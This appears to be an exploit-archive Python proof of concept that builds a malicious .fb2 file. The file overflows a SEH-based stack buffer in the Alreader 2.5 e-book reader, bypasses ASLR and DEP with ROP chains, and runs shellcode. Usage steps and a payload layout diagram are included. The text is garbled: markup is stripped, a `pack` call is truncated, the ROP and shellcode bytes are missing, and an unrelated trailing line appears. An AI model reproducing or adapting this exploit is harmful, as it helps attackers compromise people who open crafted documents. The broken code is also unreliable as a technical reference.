#!/usr/bin/env python #************************************************************************************************************* # Exploit Title: Alreader 2.5 .fb2 SEH Based Stack Overflow (ASLR and DEP bypass) # Date: 25.10.2015 # Category: Local Exploit # Exploit Author: g00dv1n # Contact: g00dv1n.private@gmail.com # Version: 2.5 # Tested on: Windows XP SP3 / Windows 7 / Windows 8 # Vendor Homepage: http://www.alreader.com/index.php?lang=en # Software Link (ENG): http://www.alreader.com/download.php?file=AlReader2.Win32.en.zip # Software Link (RU): http://www.alreader.com/download.php?file=AlReader2.Win32.ru.zip # CVE: # Description: # Alreader 2.5 its free FB2 reader for Windows. # FB2 format its just XML. FB2 contain

block. # Overflow occurs if you create a long name of the author. # App used WCHAR (1 char - 2 bytes ). If we create file in UTF-8 then app turn every single byte into two. # For example 41 41 - 00 41 00 41 # So We should use UTF-16. # # Also, we can use single null byte in payload. # # # # Instructions: # 1. Run this py script for generate AlReader-fb2-PoC-exploit.fb2 file. # 2. Run Alreader.exe # 3. Open AlReader-fb2-PoC-exploit.fb2 ( FILE -> Open ) # 4. Enjoy running Calc.exe # # Exploit owerview: # For bypass ALSR I used a ROP style. Main module Alreader2.exe non-ALSR. It also contain calls GetModuleHandleW # and GetProcAdress. So using this functions I can get pointer to call VirtualProtect to make stack executable and # run Shellcode. # # At overflow overwritten SEH. So we can control EIP. For this spray Jump Adress in payload # ( It is necessary to adjust the offset in different systems .) # Then to get control of the stack we need ADD to ESP some value. (ADD ESP, 808h). Then ESP will point to ROP NOP # ( It is necessary to adjust the offset in different systems .) # Then the control get ROP chain . # # Program have Russian (RU) and English (Eng) versions. # ROP chains for them the same but different addresses. ( addresses of ADD ESP, 808h and ROP NOP same for all versions ) # For a combination of two versions into one exploit I place two ROP chains one after another. # For RU version then an exception occurs, control passes first ROP chain. (ADD ESP, 808h RETN 4 then ROP NOPs ) # For Eng version after ADD ESP, 808h RETN 4 and ROP NOPs arises yet another exepiton and Call ADD ESP, 808h. # So ESP jump over first ROP chain. ROP NOP correct offset and Second ROP chain for Eng version, get control. # With these tricks, the exploit works correctly for both versions. # # Below is ANSI-diagram of the payload: # # =-------------------------= # | gdvn | just fan magic bytes # |-------------------------| # | | # | jmp from SEH adress | x 500 Spray Andress to Jump from oveeride SEH # | | (ADD ESP, 808h RETN 4) # |-------------------------| # | | # | ROP NOP | x 500 Spray ROP NOP (RETN) # | | # |-------------------------| # | | # | ROP chain for | # | RU version | # | | # |-------------------------| # | SHELLCODE | Run Calc.exe # |-------------------------| # | | # | ROP NOP | x 250 Spray ROP NOP (RETN) # | | # |-------------------------| # | | # | ROP chain for | # | ENG version | # | | # |-------------------------| # | SHELLCODE | Run Calc.exe # |-------------------------| # | | # | ROP chain for | # | ENG version | # | | # |-------------------------| # | | # | | # | Junk | 'A' x 6000 # | | # | | # =-------------------------= # # # # # #************************************************************************************************************** ####################################################################################################### from struct import * ####################################################################################################### file_result = "AlReader-fb2-PoC-exploit.fb2" ######################################################################################################## fuz_text = '' # init fuzzy string jmp_to = pack('

''' end = '''

EXPLOIT TEST

''' start_u = start.encode('utf-16') end_u = end.encode('utf-16') fout = open(file_result, 'wb') fout.write(start_u) fout.close() fout = open(file_result,'ab') fout.write(fuz_text) fout.close() fout = open(file_result,'ab') fout.write(end_u) fout.close() print "[*] File successfully created !!\n\n"

Query Builder